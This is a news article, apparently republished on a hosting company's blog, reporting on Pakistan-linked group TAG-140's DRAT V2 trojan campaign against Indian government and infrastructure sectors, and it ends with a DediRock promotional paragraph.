A hacking group with links to Pakistani cyber operatives has been found targeting Indian government organizations using a modified version of a remote access trojan (RAT) known as DRAT. This activity is attributed to a threat actor named TAG-140, which is believed to be associated with the SideCopy hacking collective, a subgroup of the Transparent Tribe (or APT-C-56).
Recorded Future’s Insikt Group has noted that TAG-140 showcases a consistent evolution in its malware tactics and delivery methods. Their latest campaign involved spoofing the Indian Ministry of Defence with a fake press release portal, marking a significant shift in both the malware’s architecture and its command-and-control functionalities.
The newly updated RAT, referred to as DRAT V2, is part of SideCopy’s arsenal, which also includes various other RATs designed to attack both Windows and Linux systems. This attack emphasizes TAG-140’s ability to adapt their methods, using a diverse set of RAT malware to extract sensitive information while complicating detection and attribution efforts.
Targeting has broadened beyond traditional sectors, such as government and defense, now encompassing railways, oil and gas, and external affairs. Recorded Future details an infection method utilizing ClickFix-style techniques, which cleverly spoof the Indian Ministry of Defence’s site to deliver a modified version of DRAT.
The fraudulent site contains a single clickable link that initiates an infection process, copying malicious commands into the user’s clipboard to prompt execution. This leads to the retrieval of a malicious HTML Application (HTA) file from an external server, which launches a loader that facilitates additional infections and maintains persistence.
DRAT V2 enhances its command capabilities, supporting arbitrary command executions while obfuscating command-and-control IP addresses. Unlike its predecessor, it opts for a simpler mechanism with most command headers remaining in plaintext, favoring effectiveness over stealth.
The trojan is equipped to execute various functions on infected systems—ranging from reconnaissance to data exfiltration, all while allowing for both automated and manual post-exploitation activities without auxiliary tools.
In addition to TAG-140, state-sponsored group APT36 has been active, especially amid ongoing India-Pakistan tensions, deploying Ares RAT against a variety of sectors. Meanwhile, a new Go-based malware variant called DISGOMOJI has emerged, showcasing evolving tactics by leveraging different communication methods for command-and-control operations.
The cyber espionage threat is bolstered by actors like Confucius, who are now deploying advanced stealer malware and modular backdoors, index a continuing trend of sophistication in cyberattacks targeting nations across South Asia.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.